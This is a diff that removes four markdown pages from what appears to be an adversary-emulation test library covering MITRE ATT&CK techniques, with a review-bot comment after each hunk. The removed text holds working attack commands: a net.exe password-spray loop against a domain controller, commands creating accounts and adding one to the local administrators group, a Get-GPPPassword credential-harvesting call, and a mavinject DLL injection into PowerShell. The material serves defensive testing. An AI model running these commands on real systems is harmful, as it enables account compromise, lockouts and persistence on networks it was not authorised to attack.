clean up completed md
@@ -1,16 +0,0 @@
|
||||
# Brute Force
|
||||
|
||||
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
|
||||
|
||||
## net.exe
|
||||
|
||||
### Password Spray
|
||||
|
||||
|
||||
net user /domain > DomainUsers.txt
|
||||
echo "Password1" >> pass.txt
|
||||
echo "1q2w3e4r" >> pass.txt
|
||||
|
||||
Execute:
|
||||
|
||||
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
|
||||
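Review bot: Name the replacement for this T1110 page in the commit message; the hunk is a whole-file removal (`-1,16 +0,0`) and the visible diff adds nothing in its place, so "completed" cannot be checked from here. If the Password Spray steps were carried over, the replacement should add what this page lacked: a cleanup step for DomainUsers.txt and pass.txt, and a note that running the Execute loop against a domain with a low lockout threshold can lock out the accounts listed.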
@@ -1,35 +0,0 @@
|
||||
# Create Account
|
||||
|
||||
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
|
||||
|
||||
## Net.exe
|
||||
|
||||
Local user add:
|
||||
|
||||
Net user /add Trevor SmshBgr123
|
||||
|
||||
Add new user to localgroup:
|
||||
|
||||
net localgroup administrators Trevor /add
|
||||
|
||||
Domain add:
|
||||
|
||||
net user <username> \password \domain
|
||||
|
||||
Add user to Active Directory:
|
||||
|
||||
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
|
||||
|
||||
# Powershell 5.1
|
||||
|
||||
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
|
||||
|
||||
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
|
||||
|
||||
## Add User
|
||||
|
||||
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account'
|
||||
|
||||
## Create a group
|
||||
|
||||
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
|
||||
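Review bot: Two commands in this removed page are malformed and should not be carried into whatever replaces it. Under "Domain add", `net user <username> \password \domain` writes its arguments with backslashes where net.exe switches use a forward slash, and under "Add User" the `New-LocalUser` line passes a bare string to -Password (the parameter takes a SecureString) and has a non-ASCII hyphen before Description that should be a plain `-`. The page also hard-codes passwords (SmshBgr123, Pa55word123) and has no cleanup for the accounts and group it creates; a migrated test should take the password as an input and remove what it created afterwards.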
@@ -1,12 +0,0 @@
|
||||
# Credentials in Files
|
||||
|
||||
MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
|
||||
|
||||
## Group Policy Preference
|
||||
|
||||
[Payload](Payloads/Get-GPPPassword.ps1)
|
||||
[PowerSploit Source](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
|
||||
|
||||
Input:
|
||||
|
||||
Get-GPPPassword -Server EXAMPLE.COM
|
||||
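Review bot: The `[Payload](Payloads/Get-GPPPassword.ps1)` link in this removed page is relative, so check that the bundled copy of the script is either still referenced from the replacement page or removed in the same change; the visible hunks only delete markdown. Because the page also links the PowerSploit source, the replacement should say which of the two copies is expected to be loaded before `Get-GPPPassword -Server EXAMPLE.COM` is run.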
@@ -1,12 +0,0 @@
|
||||
## Hooking
|
||||
|
||||
MITRE ATT&CK Technique: [T1179](https://attack.mitre.org/wiki/Technique/T1179)
|
||||
|
||||
### Sample Windows DLL Injection into PowerShell
|
||||
|
||||
mavinject $pid /INJECTRUNNING C:\Atomic\AtomicSSLHook.dll
|
||||
|
||||
## Test Script
|
||||
|
||||
[AtomicSSLHook.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AtomicSSLHook.dll)
|
||||
|
||||
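Review bot: The "Test Script" section of this removed page links a prebuilt binary (AtomicSSLHook.dll on master) with no source or hash, and the mavinject line assumes it is already staged at C:\Atomic\. If the T1179 test lives on elsewhere, carry over the staging path and add a pinned hash or a source link so the DLL can be verified before use. The top heading here is `## Hooking` where the other removed pages open with `#`, which is worth normalizing in the replacement.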